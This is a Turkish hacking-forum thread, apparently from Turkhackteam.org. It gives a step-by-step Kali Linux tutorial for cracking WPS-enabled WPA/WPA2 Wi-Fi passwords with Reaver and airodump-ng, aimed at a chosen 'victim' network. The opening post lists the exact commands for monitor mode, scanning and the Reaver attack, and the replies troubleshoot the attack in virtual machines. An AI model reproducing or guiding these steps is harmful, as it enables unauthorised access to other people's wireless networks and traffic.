- Güncel WPS Açıklı WPA/WPA2 Wifi şifre kırma Kali Linux -

aleeted

Katılımcı Üye
17 Eyl 2008
328
0
42
Earth
Reaver WPS açıklı modem şifrelerini kıran bir program biraz uzun sürme olasılığı var ama yapacak birşey yok.Program Kali Linux’da yüklü olarak geliyor fakat eğer farklı bir linux tabanlı işletim sistemi kullanıyorsanız da programı yükleyeyip aynı şekilde komutları girebilirsiniz.

Yüklü değilse!!

Kod:

sudo apt-get install aircrack-ng reaver

1-)İlk önce wireless kartınızı bulalım.

Kod:

root@kali:~#airmon-ng

---
normal bir wireless kartı ise ismi ismi wlan0’dır.---

2-) root@kali:~#airmon-ng start wlan0

komutunu girdikten sonra monitor mode on diyecek.

3-) root@kali:~#airodump-ng wlan0

ile etraftaki ağların bssid’ini , çekme düzeyini (10 üzeri şeklinde ifade edildiği için eksi şekilde) , toplanan data ki wep şifrelerini hacklerken işimize yarar , essid yani ismini , şifreleme çeşidini vs. görüyoruz.
Not:Eğer yeterince beklerseniz length:x şeklinde gözüken yerlerdeki gizlenmiş ağlar da görünür.
kurbanımızı seçtikten sonra ,,

4-) root@kali:~#reaver -i mon0 -b BSSID_ADRESI -vv

saldırıyı başlatabilirsiniz.Eğer başarılı olursa,,

[+] WPA PSK: 'PAROLA'

ŞEKLİNDE GÖSTERİLİR...

Bende, "airmon-ng start wlan0" dediğim zaman wifi kayboluyor.

"airmon-ng stop wlan0mon" dediğimde wifi tekrar açılıyor.

"reaver -i wlan0 (mon0 yerine) -b BSSID_ADRESI -vv"

yaparsam eğer şifreleri buluyor.

Başka arkadaşlarda aynı sıkıntıyı yaşıyorlar ise bu yöntemi deneyebilirler.

Eline sağlık, işime yaradı :)

DemirtassHackTeam

Yeni üye
25 Mar 2016
30
0
Ben Sanal Vmware Üzerinden Kullanınyorum Fakat 2 Gundur aynı kodu kullnmaıyorum ama başarısız oldum tum wifiler uzerınde yardımcı olursan sevinirim

DemirtassHackTeam

Yeni üye
25 Mar 2016
30
0
hatanın cozumu bende

Parallels Desktop üzerinden yapmaya çalışıyorum ama hata alıyorum
airmon-ng komutunu girdiğimde
Interface Chipset Driver

gerisi boşluk şeklinde yazıyor wireless kartımın ismi yazmıyor. Wlan0 olduğunu varsayıp öyle denemek istedim ve airmon-ng start wlan0 komutunu girdim bu seferde
Found 2 process that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you want to kill (some of) them!
-e
PID NAME
2439 dhclient
2623 Networkmanager

Bu şekilde bir hata alıyorum mode-on olmuyor. Parallels desktop ile yapıyorum OS X üzerinden.

arkadaşım bu sorun bende oldu ama ınternetten 2 tane tar uzantılı dosya buldum hatırlasam solıcemde hatırlamıyor sende araştır hata neyse onu google yaz mutlaka bı dosya bulursun onu ındır termınale yaz sanal makıneyı kapat aç sorun kalkacaktır gene sorun devam edıyorsa wifi adaprotu ıle ılgılı sıkıntıdır

DemirtassHackTeam

Yeni üye
25 Mar 2016
30
0
kali 2.0 dan sonra mon0 yerine wlan0mon kullanmaya başladı. mon0 yazan yerlere wlan0mon yazarsan sorunun çözülür

asteğmenm zaten oyle denıyorumda fakat karşıma cıkan yazı şu şekilde

WARNING: Failed to associate with bundan sunra bssıde essıd falan cıkıyor

bır geceden sabaha bıraktım fakat sonuc yok sıkıntı nedır acaba saygılar

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.